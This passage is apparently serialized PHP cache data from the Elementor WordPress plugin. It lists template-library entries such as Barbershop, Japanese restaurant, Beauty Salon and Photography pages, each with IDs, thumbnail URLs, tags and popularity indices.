About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/06/About-Page.jpg\";s:12:\"tmpl_created\";i:1592289629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/japanese-restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:102;s:16:\"popularity_index\";i:640;s:11:\"trend_index\";i:389;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:407;a:19:{s:4:\"tmpl\";i:997;s:2:\"id\";i:13528;s:5:\"title\";s:22:\"Barbershop &#8211; 404\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/05/404-Page.jpg\";s:12:\"tmpl_created\";i:1589893152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/barbershop-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:768;s:11:\"trend_index\";i:681;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:408;a:19:{s:4:\"tmpl\";i:1009;s:2:\"id\";i:13937;s:5:\"title\";s:35:\"Japanese restaurant &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1592289748;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/japanese-restaurant-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:648;s:11:\"trend_index\";i:551;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:409;a:19:{s:4:\"tmpl\";i:1008;s:2:\"id\";i:14030;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Events\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/06/Events-Page.jpg\";s:12:\"tmpl_created\";i:1592289713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/japanese-restaurant-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:104;s:16:\"popularity_index\";i:723;s:11:\"trend_index\";i:711;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:410;a:19:{s:4:\"tmpl\";i:998;s:2:\"id\";i:13518;s:5:\"title\";s:26:\"Barbershop &#8211; Archive\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Blog-Page.jpg\";s:12:\"tmpl_created\";i:1589893157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/barbershop-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:737;s:11:\"trend_index\";i:523;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:411;a:19:{s:4:\"tmpl\";i:1016;s:2:\"id\";i:13984;s:5:\"title\";s:40:\"Japanese restaurant &#8211; Reservations\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/reservations.jpg\";s:12:\"tmpl_created\";i:1592294757;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/japanese-restaurant-reservations/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:715;s:11:\"trend_index\";i:727;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:412;a:19:{s:4:\"tmpl\";i:999;s:2:\"id\";i:13479;s:5:\"title\";s:23:\"Barbershop &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Home-Page.jpg\";s:12:\"tmpl_created\";i:1589893275;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/barbershop-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:106;s:16:\"popularity_index\";i:683;s:11:\"trend_index\";i:832;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:413;a:19:{s:4:\"tmpl\";i:996;s:2:\"id\";i:13604;s:5:\"title\";s:25:\"Barbershop &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1589893147;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/barbershop-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"Barber Shop\",\"Barbershop\",\"Footer\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:555;s:11:\"trend_index\";i:267;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:414;a:19:{s:4:\"tmpl\";i:1000;s:2:\"id\";i:13503;s:5:\"title\";s:24:\"Barbershop &#8211; About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/05/About-Page.jpg\";s:12:\"tmpl_created\";i:1589893289;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/barbershop-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:744;s:11:\"trend_index\";i:739;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:415;a:19:{s:4:\"tmpl\";i:995;s:2:\"id\";i:13612;s:5:\"title\";s:25:\"Barbershop &#8211; Header\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/06/barber-shop-header.jpg\";s:12:\"tmpl_created\";i:1589893142;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/barbershop-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:37:\"[\"Barber Shop\",\"Barbershop\",\"Header\"]\";s:10:\"menu_order\";i:108;s:16:\"popularity_index\";i:343;s:11:\"trend_index\";i:137;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:416;a:19:{s:4:\"tmpl\";i:1001;s:2:\"id\";i:13548;s:5:\"title\";s:27:\"Barbershop &#8211; Services\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/05/Services-Page.jpg\";s:12:\"tmpl_created\";i:1589893298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/barbershop-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:108;s:16:\"popularity_index\";i:761;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:417;a:19:{s:4:\"tmpl\";i:1002;s:2:\"id\";i:13560;s:5:\"title\";s:26:\"Barbershop &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1589893307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/barbershop-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:109;s:16:\"popularity_index\";i:756;s:11:\"trend_index\";i:822;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:418;a:19:{s:4:\"tmpl\";i:1003;s:2:\"id\";i:13587;s:5:\"title\";s:26:\"Barbershop &#8211; Contact\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/05/Contact-Us-Page.jpg\";s:12:\"tmpl_created\";i:1589893315;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/barbershop-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:110;s:16:\"popularity_index\";i:753;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:419;a:19:{s:4:\"tmpl\";i:982;s:2:\"id\";i:13307;s:5:\"title\";s:26:\"Online Course &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Home.jpg\";s:12:\"tmpl_created\";i:1587474541;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/online-course-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:230;s:11:\"trend_index\";i:125;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:420;a:19:{s:4:\"tmpl\";i:994;s:2:\"id\";i:13621;s:5:\"title\";s:30:\"Barbershop &#8211; Single Post\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/05/Single-Page.jpg\";s:12:\"tmpl_created\";i:1589893137;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/barbershop-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:736;s:11:\"trend_index\";i:580;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:421;a:19:{s:4:\"tmpl\";i:1131;s:2:\"id\";i:16527;s:5:\"title\";s:24:\"Beauty Salon &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/12/404.jpg\";s:12:\"tmpl_created\";i:1608622517;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/beauty-salon-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:29:\"[\"404\",\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:742;s:11:\"trend_index\";i:563;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:422;a:19:{s:4:\"tmpl\";i:983;s:2:\"id\";i:13328;s:5:\"title\";s:27:\"Online Course &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/About.jpg\";s:12:\"tmpl_created\";i:1587474558;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/online-course-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:508;s:11:\"trend_index\";i:429;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:423;a:19:{s:4:\"tmpl\";i:984;s:2:\"id\";i:13338;s:5:\"title\";s:33:\"Online Course &#8211; Course Page\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Course-Page.png\";s:12:\"tmpl_created\";i:1587474574;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/online-course-course-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:113;s:16:\"popularity_index\";i:337;s:11:\"trend_index\";i:310;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:424;a:19:{s:4:\"tmpl\";i:985;s:2:\"id\";i:13352;s:5:\"title\";s:29:\"Online Course &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1587474591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/online-course-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:114;s:16:\"popularity_index\";i:565;s:11:\"trend_index\";i:533;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:425;a:19:{s:4:\"tmpl\";i:1130;s:2:\"id\";i:16535;s:5:\"title\";s:27:\"Beauty Salon &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/12/Footer.jpg\";s:12:\"tmpl_created\";i:1608622498;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/beauty-salon-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:32:\"[\"Beauty Salon\",\"Footer\",\"Hair\"]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:524;s:11:\"trend_index\";i:126;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:426;a:19:{s:4:\"tmpl\";i:971;s:2:\"id\";i:13187;s:5:\"title\";s:33:\"Interior Design &#8211; Home Page\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Home.png\";s:12:\"tmpl_created\";i:1586148661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/interior-design-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:331;s:11:\"trend_index\";i:264;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:427;a:19:{s:4:\"tmpl\";i:1453;s:2:\"id\";i:16346;s:5:\"title\";s:33:\"Your New Home &#8211; Real Estate\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp3-l.png\";s:12:\"tmpl_created\";i:1660205402;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/your-new-home-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:11:\"Real Estate\";s:4:\"tags\";s:31:\"[\"Landing Pages\",\"Real estate\"]\";s:10:\"menu_order\";i:116;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:428;a:19:{s:4:\"tmpl\";i:972;s:2:\"id\";i:13199;s:5:\"title\";s:29:\"Interior Design &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/About.png\";s:12:\"tmpl_created\";i:1586148666;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/interior-design-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:116;s:16:\"popularity_index\";i:316;s:11:\"trend_index\";i:334;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:429;a:19:{s:4:\"tmpl\";i:1129;s:2:\"id\";i:16545;s:5:\"title\";s:27:\"Beauty Salon &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/12/Header.jpg\";s:12:\"tmpl_created\";i:1608622495;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/beauty-salon-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:32:\"[\"Beauty Salon\",\"Hair\",\"Header\"]\";s:10:\"menu_order\";i:117;s:16:\"popularity_index\";i:356;s:11:\"trend_index\";i:49;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:430;a:19:{s:4:\"tmpl\";i:973;s:2:\"id\";i:13214;s:5:\"title\";s:32:\"Interior Design &#8211; Projects\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/portfolio_s.jpg\";s:12:\"tmpl_created\";i:1586148672;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/interior-design-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:117;s:16:\"popularity_index\";i:367;s:11:\"trend_index\";i:323;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:431;a:19:{s:4:\"tmpl\";i:641;s:2:\"id\";i:7686;s:5:\"title\";s:12:\"Blog Posts 1\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2018/03/blog_posts.png\";s:12:\"tmpl_created\";i:1521558047;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/blog-posts-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:26:\"[\"Archive\",\"Blog\",\"posts\"]\";s:10:\"menu_order\";i:118;s:16:\"popularity_index\";i:131;s:11:\"trend_index\";i:152;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:432;a:19:{s:4:\"tmpl\";i:974;s:2:\"id\";i:13229;s:5:\"title\";s:31:\"Interior Design &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/Contact-Us.png\";s:12:\"tmpl_created\";i:1586148677;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/interior-design-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:118;s:16:\"popularity_index\";i:395;s:11:\"trend_index\";i:337;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:433;a:19:{s:4:\"tmpl\";i:959;s:2:\"id\";i:12948;s:5:\"title\";s:29:\"Photography &#8211; Home Page\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/02/Home_s.png\";s:12:\"tmpl_created\";i:1582093442;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/photography-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:119;s:16:\"popularity_index\";i:241;s:11:\"trend_index\";i:201;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:434;a:19:{s:4:\"tmpl\";i:960;s:2:\"id\";i:12798;s:5:\"title\";s:25:\"Photography &#8211; About\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/02/About_s.png\";s:12:\"tmpl_created\";i:1582093446;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/photography-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:120;s:16:\"popularity_index\";i:499;s:11:\"trend_index\";i:374;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:435;a:19:{s:4:\"tmpl\";i:484;s:2:\"id\";i:5283;s:5:\"title\";s:9:\"Clients 1\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/clients_white_2.png\";s:12:\"tmpl_created\";i:1520443478;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/clients-1-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"clients\";s:4:\"tags\";s:11:\"[\"Clients\"]\";s:10:\"menu_order\";i:120;s:16:\"popularity_index\";i:294;s:11:\"trend_index\";i:202;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:436;a:19:{s:4:\"tmpl\";i:961;s:2:\"id\";i:12868;s:5:\"title\";s:27:\"Photography &#8211; 